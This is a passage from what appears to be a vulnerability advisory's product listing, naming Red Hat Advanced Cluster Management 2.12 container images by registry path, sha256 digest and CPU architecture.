"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/acm-must-gather-rhel9@sha256:dc38a15065a73653097c85f6eb1b287a97498bc69dd86e7dbcd9efe6853255bb_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/acm-must-gather-rhel9@sha256:f544c239f288daac99ca0018719000678f2e9f27b8303a5182fa01777c4c12f0_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/acm-prometheus-config-reloader-rhel9@sha256:0184923381940f806687d21a3422e16bee10b39b409fcecb50c940ed9b7e4d58_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/acm-prometheus-config-reloader-rhel9@sha256:54390653fd89def95d9cba388cd37466ce709d843a9950b545091d9d9e14b4e4_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/acm-prometheus-config-reloader-rhel9@sha256:874f930ace72bd2771944e734432c322735b3bd91804019b211953070a308dd9_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/acm-prometheus-config-reloader-rhel9@sha256:d865a100823ff771c33e5e5799f16e1207158ab7519c6ac8a4daf53e1c4ae092_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/acm-prometheus-rhel9@sha256:57fb017c2ba0f20880fc278689d37919ab95a88dffa0626d9a48050bef3b6fe3_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/acm-prometheus-rhel9@sha256:7d87a9cda623d527c5eaa08c5637422ed136339a9688edd5e8e9cc46f254beb3_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/acm-prometheus-rhel9@sha256:b123eb6e855ec01a82e6ec2afa052eb344e2851b3d134514c53162012852d568_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/acm-prometheus-rhel9@sha256:f12861597e8d62263d2ffa52b1fd19614a063605968999aeef33f444cfa82539_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/acm-search-indexer-rhel9@sha256:28ca07a0f4c2f02d47bfecae31110cbdc3284f1a7d688b559ed7d6305930ce81_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/acm-search-indexer-rhel9@sha256:713fafc87903d4284173e4b9690d0e3deba23d51ca0974106f0a76a450c38501_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/acm-search-indexer-rhel9@sha256:9a6847c058acd9d84d402506ac00576e0c437edb261c8e564605abab1b97428c_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/acm-search-indexer-rhel9@sha256:c033acafe192f185dde20f032d399de7f4f9d25804ba96afe50e08eb1608a956_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/acm-search-v2-api-rhel9@sha256:40cfab127e82cc6afc68b0642832e84ec45838db71d5500a42d87921ade70171_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/acm-search-v2-api-rhel9@sha256:6dbefefd5b830cd9431559d7123d9643dca69e0cbbb58f5c5cc90f3d5e526c09_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/acm-search-v2-api-rhel9@sha256:8262fa7a50560e0ac051f9ec158daceeb384acc92b1f98c0b7b73f5ec0451908_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/acm-search-v2-api-rhel9@sha256:b2ee688170d432298a3eb7d0b057a01bcba26dfddfeabca7941f4bc3fc865141_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/acm-search-v2-rhel9@sha256:0478cb24ab3df5826881b91dd0ea1b8152defdd04e38d0bc500a860a828716b0_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/acm-search-v2-rhel9@sha256:247872fe30c6d0bbb1098b6f189fd23aca2357122e591eb2bed3c79b0fe27055_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/acm-search-v2-rhel9@sha256:b6a958526ae7d64016a110bd81ee38218bce014d52f10a6517a471bddfb93d45_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/acm-search-v2-rhel9@sha256:ee89796a7ee9e6ab9cde9a5a450e16221bbdb74444188939c983d6d185bee08a_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/acm-siteconfig-rhel9@sha256:243d75725446e0fe6be10ba04796c4db395f911470d1fd2575d35a3f1c82930c_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/acm-siteconfig-rhel9@sha256:89f973ff38fcf35a484da1531bcf00db5e1d387a64a6dcbb25f19a5c26494584_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/acm-siteconfig-rhel9@sha256:a33b245208c9999546524f3bf971bb220418045dd799cebc43f0413823db0f8b_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/acm-siteconfig-rhel9@sha256:ea918d66e2be8cc1411e048f3638afae348a44df36143621bcd3132718b33664_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/acm-volsync-addon-controller-rhel9@sha256:22b747e9952ede6b831297b64684acaafaf3e12998d6872081a08ae39b52c87b_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/acm-volsync-addon-controller-rhel9@sha256:5d368764b9745d9a977bde3c4cd2faac1a344aea716ce626a0904b7da80f5267_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/acm-volsync-addon-controller-rhel9@sha256:8deed2b9ade0bc7ab30fd93d165fc1a8e18caab7b4af1d1b2b326dc93570c498_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/acm-volsync-addon-controller-rhel9@sha256:b68a3a1fe74bc4b319859874ca19a4e35c72174afc6a2af08e4bd7b64898d27f_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/cert-policy-controller-rhel9@sha256:5f814b2ab34c4dcaedb7394d9f1ef9bd4d1bf6af934cd716ac44d1cfc43a6edf_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/cert-policy-controller-rhel9@sha256:9acfa5180f02a68485cd1fc43e4794c7ffbac02c16942fabfbad9dd586c8ff74_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/cert-policy-controller-rhel9@sha256:c409f96ae15f3022713e434c4c8f146d943dbf48e852e0b8f90b4964ec0736a7_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/cert-policy-controller-rhel9@sha256:f72ecb77638a3d19ef4480040995278031deb4551f139e376994bc0ac3462ef5_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/cluster-backup-rhel9-operator@sha256:243ea42175c4fa3d189e2f2bf061c9645d5d3b2870378149c52740f563c91ce8_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/cluster-backup-rhel9-operator@sha256:3b23775b863a11e1edd62b24c01085b74019b7f414d0784c99d41b1e0e8a6e9b_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/cluster-backup-rhel9-operator@sha256:3e29508feb3f13f4771e6321f9b2f281d557e3239e52e29301ef30a305ffcde9_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/cluster-backup-rhel9-operator@sha256:427b347a2e17b66849dc51f9a62563ae8c013d5794c61821141dec737d059304_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/config-policy-controller-rhel9@sha256:0b87acce1304734d30b2bfbd5d277e72efce2433680111e02fc5cff8127376dd_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/config-policy-controller-rhel9@sha256:438093777b18dc840316a9a82331d832fdc9f3d83aaae20d97f56ed67b58a359_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/config-policy-controller-rhel9@sha256:93d29e5678d618cfa84ce60f2d62ba96929ea47ec1515f63a9d61d548968e902_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/config-policy-controller-rhel9@sha256:b182a45fbe8caf69df6145ed79f2ab0e82c955ff5f5caa7fab8d0faffdb50664_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/endpoint-monitoring-rhel9-operator@sha256:4f666d6acef380066f2a35f128a2842ee1f5cf800c93ac6b0fb3c303d3bde26b_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/endpoint-monitoring-rhel9-operator@sha256:6938b16a6314149cc86e10a91e05e9b84e00483dadd1d0353002222a350746bf_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/endpoint-monitoring-rhel9-operator@sha256:8b91cd509eee3e1a5e6475076512709bd233413bfbea5caa44455fd62bcc9d35_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/endpoint-monitoring-rhel9-operator@sha256:f734a96076321df1f52da24f047db29d3956ceb742f4fa488a11d5b302faf66f_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/governance-policy-propagator-rhel9@sha256:1cfe9d5337e2d2d6d714d5d1aecd00ed626f4c70a5a655d89c8001717be9a6f5_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/governance-policy-propagator-rhel9@sha256:488d5dea57994e8d865f8047f3b0ed8b2250273898972eea576fa012bda5c0c4_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/governance-policy-propagator-rhel9@sha256:5bf4239a40668dd33521ad9cebdc2022331e251ad6fd2e8ec0de8526d321b9e5_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/governance-policy-propagator-rhel9@sha256:bc42add4b0d8571b0b78d09357c574a7d0a858769e6109a13d1487de36ba1d2f_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/grafana-dashboard-loader-rhel9@sha256:1395a46c08410f06aa507bedc8d664b6dabda344d9c604bd71bbd07fb07966c4_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/grafana-dashboard-loader-rhel9@sha256:4b1bdbd8499769e3fe41d438ff2f98a0a91fecf88d70aa359a6be16aa5454fda_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/grafana-dashboard-loader-rhel9@sha256:91d0b7afff7c89c667986f22280a95ab81409aacaf6c73ac6606bc7bbae98c7e_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/grafana-dashboard-loader-rhel9@sha256:c24affed309531bede6ca42f8b2a6b3ba4df5a8c59084bf5050290b8f031f364_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/insights-client-rhel9@sha256:036d63ee1fe55977200dce97fd151726266e84423067039c57ca54dcc8b6b440_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/insights-client-rhel9@sha256:1aff938b39c21378c0f8daa439e330159c0bd91f234035a127efb579f6434262_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/insights-client-rhel9@sha256:540de89284569933a75e87f4c85fc11f987a733f60f9d877f20e5c4fc054fabf_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/insights-client-rhel9@sha256:8352d34740671e09ebdd558bb2a40a8605aa26afbcfff8dae29ccaf86d81239d_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/insights-metrics-rhel9@sha256:4707fd802a74ca843e2b788b69dc1d4615acba980df380e0cc25cfca6a82e215_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/insights-metrics-rhel9@sha256:5c3ee23cff1681f8e86f2bd5d1cebf187db867fb1887d7803638d1192e4b1a60_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/insights-metrics-rhel9@sha256:6260b2ecf13d9c5cdf95f0000044405d3ca03815937284b5e2848147d3366538_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/insights-metrics-rhel9@sha256:78cbcb6e0a0e43cbac6b285334ba789d4a4940e12f472d56a7d953b342a34d1f_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/klusterlet-addon-controller-rhel9@sha256:6c733e3c2cc551a4bb17601347f873d3b28e4d6b60a26db3587173c617a85c7e_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/klusterlet-addon-controller-rhel9@sha256:6cbf2b90d1cbfbca5fe5b04f73024a5d78248b1e4ccf6041b77018d79296e1ee_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/klusterlet-addon-controller-rhel9@sha256:8b47e540acf25c492b4e6dff77f419c65c80e14d8c95555eba549a7fbbaed564_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/klusterlet-addon-controller-rhel9@sha256:fffd63a467ff39cb493e680ca5d7fff974c66afb014f3d5e83591b934e58b2ac_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/kube-rbac-proxy-rhel9@sha256:06ff7067f1bc9d0cafba03eeb46bf3214dd70f20e5eb05e3a989d12cfee5791f_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/kube-rbac-proxy-rhel9@sha256:33d9572f58f2bbd6c1dfc07908b328ecc25b12f578d2f3839f70763c032fe39e_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/kube-rbac-proxy-rhel9@sha256:997e343d3a52d953cca38ea609dabfa38d8e85e3122f0c48bdf34dc398b0e75c_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/kube-rbac-proxy-rhel9@sha256:ddeb74afd3c44b7e6ce34d14245f9b0e686af1d6628c2bae2b1ee4766107590e_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/kube-state-metrics-rhel9@sha256:8b4adb87be3cd1222dbec53de842569d89f1edc18f36f5da691f2b9aef851af8_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/kube-state-metrics-rhel9@sha256:a5544dbf33ee411c1e2bce8af5cfd7defda6de92a358097419f2bac069669275_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/kube-state-metrics-rhel9@sha256:b3caff7e4a5254b20d305ec57b70d372ba09a4605047812703a7c7df6628192b_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/kube-state-metrics-rhel9@sha256:cde651ab8f772b65d45464e4997c6ae17e655696afebf3ad51aa079853627061_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/memcached-exporter-rhel9@sha256:33ae10350417be44904c47179d655c36e5724241e5dd1497d6952c46ada085e3_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/memcached-exporter-rhel9@sha256:92c1123b4f6c4e89be7a0d9cd4adcafb9b97faebebd61dc24127661e45b61ec7_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/memcached-exporter-rhel9@sha256:b321bc989aede13694825dfa5ee6e6bf047e1d8da91a8fb83dc29cd0b27ab4ff_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/memcached-exporter-rhel9@sha256:d41b061123db846fb27ddccffa7c57528326bcfa109f7d0a754e64aa16304b05_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/metrics-collector-rhel9@sha256:19ccb43f156361e14c8d69a6d832b60a63801fec502bd0f1632a264611c00a5c_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/metrics-collector-rhel9@sha256:345bd79af661294f223be69961f96494da36e311906fb3a2e64b53677f65fd32_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/metrics-collector-rhel9@sha256:3cb2dd7e3a2cd4e2a46cde1f48dd72645c2c51e8bfc0eca8753cc851c726d29c_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/metrics-collector-rhel9@sha256:c834685380ba00674a2835151ec9e4932457abefe6318748aba92cbe8443307d_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/multicloud-integrations-rhel9@sha256:12c970f2005e943d674b35c711d2232f146bbbcf8e3807b3fb3c816b42e0cd8a_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/multicloud-integrations-rhel9@sha256:dc231932eb7a2a9969fae5fb0e6f95594d71ddf6f957a2cb4751950ab8332510_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/multicloud-integrations-rhel9@sha256:e671767bca7b68bada15e2820d0df6adc49fbffcdb6c9708ee3a5346a919a1e4_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/multicloud-integrations-rhel9@sha256:f64b875dcce5d957aaf198e2055a47f7faab441342aab6b2e055efe2d41c78b7_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/multicluster-observability-rhel9-operator@sha256:0799283c1830e1aadd09976286eec671d0a86e44c155238279938b4f329f7157_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/multicluster-observability-rhel9-operator@sha256:7143a1a00eae582cff7671ab03464db03db48e89bd988ecc4851278922aeea29_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/multicluster-observability-rhel9-operator@sha256:9bac11bcf557740673e7168bb31fb6db8c5d92609094e5f1d1cb4c3ef6bc9603_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/multicluster-observability-rhel9-operator@sha256:ea03fd92669382846af5c8fa0b58f6858f123060d122f370d6af837f46d9d8aa_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/multicluster-operators-application-rhel9@sha256:53a9844ffdd2d3f8cee8737722de91511cefdb4c65a7db614de6c4e070f70431_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/multicluster-operators-application-rhel9@sha256:c603c06aa983d6b118e506bd2e6fba19f0cd26e379513c9c710ea517d2bc0d0f_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/multicluster-operators-application-rhel9@sha256:d9a867a6d289263f568b8940a9b970c8680061c1f26aebb9f8cc479956e9a030_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/multicluster-operators-application-rhel9@sha256:f9e0a972cd08f77b71dd8b2217c57b98b36c5612ddfd6bb74704c378a03dd7e1_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/multicluster-operators-channel-rhel9@sha256:1bda811b132cbc2220815d36983af98e0aafdcb4d30fa78f56bbd85ffc30a37c_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/multicluster-operators-channel-rhel9@sha256:3bc66380cc46ef4bc18498a306535c11f0ba41a629bde92f9f6a35b8a8d11f89_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/multicluster-operators-channel-rhel9@sha256:c4f9eea72efd49d201456547b2a35abd6a194894e72c209bbe16763b86954639_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/multicluster-operators-channel-rhel9@sha256:d4b3934ecbd4882845770c313060dc76b588ffa3753f2b2ae0ec5f53ba868935_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/multicluster-operators-subscription-rhel9@sha256:805d44ff7dcd6df5bd73cd58c0f410d8bdeac932d7c440b0c381517c3e1401ae_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/multicluster-operators-subscription-rhel9@sha256:b3cbb2410596e3e0741f518ee3bbf8f6eebce0ea4a7ea4274a1e76f01692fe1e_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/multicluster-operators-subscription-rhel9@sha256:c6365357cdc1cd7b0adc4e1813f42d2c67501f770ee58e376e0c02096baca731_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/multicluster-operators-subscription-rhel9@sha256:e3d8e0154fdaaa4e292949374fa637ec80827df473f2e3f8cc37425d98dc271b_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/multiclusterhub-rhel9@sha256:943de4b7c383fc679eac276a25ce6557336c95b92ebaa520bb74f8aee24115f5_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/multiclusterhub-rhel9@sha256:d448249f704e54f4316122fb3ad923295ffb5d6d2d16044803b56d1f8439de8f_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/multiclusterhub-rhel9@sha256:ee2ffe06e09f3694be474d69be61552d0e5a4dd7a25df89682aa59e4a10e02f8_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/multiclusterhub-rhel9@sha256:f9dfff5ac57b47b580c733413ab3d10dec4d4d50589da894eb0a8278978459f9_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/node-exporter-rhel9@sha256:5c90f0eddf6dbee5bdf11a6a818e4fbac22f6c8b2883728416dcc7aaeedd7362_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/node-exporter-rhel9@sha256:6528ed4780303fa09312c19f87c0f7d7109d91858473f73e6567e0fdde694b3f_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/node-exporter-rhel9@sha256:6d1a86ffe09cbc6eba216db55800c21641e308dd1cee215972e0065136b9c612_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/node-exporter-rhel9@sha256:fc6ea36b48ce47052d875988f378cad3ec9cec80189a605acdf1509f2beb52cf_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/observatorium-rhel9-operator@sha256:0caaa7f18df2105c9d6199343a70640dd6b558d7de55f2026f99b48d702c5afc_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/observatorium-rhel9-operator@sha256:28cfe0893f17b70ff67f70cb7e471c8c724bf921b7a36c69ca2c43505bae635e_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/observatorium-rhel9-operator@sha256:7309f5d61a0fe99dfd8d523736afe2c8a709385e0eaaeaacfbda362fc7c2a16b_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/observatorium-rhel9-operator@sha256:ccf06b51ce92c9f0fe9594b0082d0b09f77bb65b38ce08d5e02ac4f5a6fab2a4_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/observatorium-rhel9@sha256:31153305711975b0bd5f780133699aeca52e96859363e85718c9047b26a32dbf_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/observatorium-rhel9@sha256:55b2f0e54a6fdb3fb83f1af1f16524ebf36f0afb366f40fbbc8768cd4995ffb3_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/observatorium-rhel9@sha256:6be8bc17e09b099a79437f27ded3d563814e3c6702dd9ed698f5f17b9fb3afa2_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/observatorium-rhel9@sha256:73c4ce25c2cc67fe3bec0cfc51e4c8b34929288f931f0f19c65bbbc969d0c588_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/prometheus-alertmanager-rhel9@sha256:128b74a18fb1fd1ba63f074d9d31e892a46048068608784f2696a4bbc7b57595_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/prometheus-alertmanager-rhel9@sha256:6b3fd2f8e3a164670dbbc59fd8c77057f98d97c0ba6ed7975711923e8acabb78_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/prometheus-alertmanager-rhel9@sha256:7c8de9466fee7334af1fef5647c4abaf9bd6b6012c301bb5c3c6a630cdc1dded_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/prometheus-alertmanager-rhel9@sha256:bbd945e3d0f92c8dfeb5601d7aa4d306f87e6facd9471a3c42f2582a264cd2ba_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/prometheus-rhel9@sha256:3aa3b11dfb3e0c9daba4818838a3a42e52ab81ecf27fb5fddd779746fd10d6d8_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/prometheus-rhel9@sha256:8c19e6e38d755f35021ed1c57f3e69be65240df37539b72b8fe0d3f8ab050e36_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/prometheus-rhel9@sha256:a8f9a5a9f31cd903f23dfec9c832ed703d06882246aad25bd03e9512b633e5ca_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/prometheus-rhel9@sha256:e528d7996cda9185d5858a0edd8114b782d5627725d6e350fb087ba9f6270206_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/rbac-query-proxy-rhel9@sha256:6a4fe92a913d7b778b8e756c618537c4a44aba7adc980355afcaf88b5cb871e4_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/rbac-query-proxy-rhel9@sha256:b2563c07d52bd29574e0a896a2e72b90ff1144be31ec3dab9f89840be79936df_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/rbac-query-proxy-rhel9@sha256:baacec8e68f6fcc0f4ee99f4405f80c560be369ec969a574534b01f43419a15d_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/rbac-query-proxy-rhel9@sha256:c7a24bf421728915b2e0cf3a7e803cbb18032959feab0cd2867b13f356136178_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/search-collector-rhel9@sha256:1f747a2fe3ee946ec3df5335c6527da41b84a92c1b7163e24b72809f958934a5_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/search-collector-rhel9@sha256:699833b6f4ee8b8fdb45d5ed4a312972281576700a1a1d28dc0048d6c7188361_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/search-collector-rhel9@sha256:b807be4db3f323ac57c1464843c1b7dc1479b24ac89dadd070813da75f282375_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/search-collector-rhel9@sha256:d1c112f5dd97d3415030ab12eb93006c04070f70176e89e2555b071d4b1dc881_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/submariner-addon-rhel9@sha256:a20f72f80173be40bbd330de88bc94d32e7596bf1b0fd76dd895b739f2df1c2e_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/submariner-addon-rhel9@sha256:d815d7688e0ad3e0d9b20a73f418282ac47eb0c6a2721db959374ff9b5756918_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/submariner-addon-rhel9@sha256:dd779a5f1de2fb5b61333ef7d11642a4e8cbfcb745f3f0a4318e336f6fe4e5b6_arm64",
